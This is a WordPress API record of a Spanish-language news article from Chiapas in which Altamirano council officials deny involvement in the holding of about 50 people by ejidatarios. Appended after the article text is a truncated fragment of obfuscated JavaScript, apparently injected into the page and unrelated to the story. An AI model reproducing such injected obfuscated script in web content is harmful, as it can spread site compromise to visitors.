{"id":12243,"date":"2023-10-12T02:23:13","date_gmt":"2023-10-12T02:23:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12243"},"modified":"2023-10-12T02:23:14","modified_gmt":"2023-10-12T02:23:14","slug":"se-deslinda-concejo-municipal-de-retenidos-en-altamirano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12243","title":{"rendered":"Se deslinda Concejo Municipal de retenidos en Altamirano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/IMG-20231011-WA0096-1024x770.jpg\" alt=\"\" class=\"wp-image-12244\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/IMG-20231011-WA0096-1024x770.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/IMG-20231011-WA0096-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/IMG-20231011-WA0096-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/IMG-20231011-WA0096.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. La presidenta concejal de Altamirano, Mar\u00eda Garc\u00eda L\u00f3pez, hizo un llamado a los familiares de las 50 personas retenidas, por un grupo de ejidatarios a mantener la calma, confiar en las autoridades y se deslind\u00f3 de las acusaciones vertidas en redes sociales, d\u00f3nde los responsabilizan y asegur\u00f3 este caso se encuentra en manos de la Fiscal\u00eda General de Justicia.&#8221;Hago un llamado a los familiares de los que tienen problemas el d\u00eda de hoy, yo les invito a qu\u00e9 guarden la tranquilidad y la calma, nuestro gobernador est\u00e1 haciendo todo lo posible para que tengamos una soluci\u00f3n buena, esperemos en Dios que a todos los compa\u00f1eros que est\u00e1n viviendo est\u00e1 situaci\u00f3n, que los regresen con vida y sanos con sus familias, porque la verdad todo lo que nos pasa da tristeza y lo que apuesto con ellos es que haya paz y tranquilidad, no tenemos los datos precisos, pero hemos visto en redes sociales que son unos 50 retenidos, se deslinda el Concejo Municpal, no tenemos nada que ver, por eso le digo a la ciudadan\u00eda que tengamos calma y esperemos que regresen con vida los compa\u00f1eros&#8221;.Por su parte, el s\u00edndico concejal, Gabriel Montoya, dijo desconcer el motivo del conflicto entre ejidatarios y cuestionado sobre si esto se trata de un grupo disidente al Concejo, tambi\u00e9n dijo desconocer, pero mencion\u00f3 que efectivamente hay grupos que se encuentran en desacuerdo como en todo gobierno, pero la mayor\u00eda de la poblaci\u00f3n se encuentra conforme con el trabajo y las gestiones que vienen realizando, para cumplir con la necesidades sociales de Altamirano.&#8221;Ellos sabr\u00e1n cu\u00e1l era su estructura que formaron ellos, si tienen alg\u00fan detalle, es porque algo les fall\u00f3 a ellos, es pr\u00e1cticamente asunto de ellos, el motivo del secuestro nosotros no sabemos, ah\u00ed la Fiscal\u00eda que ha intervenido, y ellos saben que hacer, el gobernador est\u00e1 muy puntual viendo est\u00e1 situaci\u00f3n que evolucione para rescatarlos con vida, en todo municipio hay grupos desidentes, pero todos son gobernados y se tienen que ver de igual manera, debe haber unidad para que el gobierno funcione bien&#8221;.Finalmente, coment\u00f3 que este problema no es de ahora, sino que desde el a\u00f1o pasado, &#8220;no vamos a entrar a un intercambio de declaraciones, si ellos nos echan la culpa, son libres de decir lo que ellos sienten y como gobierno debemos entender que no somos totalitarios, no todos est\u00e1n de acuerdo con nosotros y la manifestaci\u00f3n es parte de la pol\u00edtica municipal&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. La presidenta concejal de Altamirano, Mar\u00eda Garc\u00eda L\u00f3pez, hizo un llamado a los familiares de las 50 personas retenidas, por un grupo de ejidatarios a mantener la calma, confiar en las autoridades y se deslind\u00f3 de las acusaciones vertidas en redes sociales, d\u00f3nde los responsabilizan y asegur\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12244,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12243","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12243"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12243\/revisions"}],"predecessor-version":[{"id":12245,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12243\/revisions\/12245"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12244"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}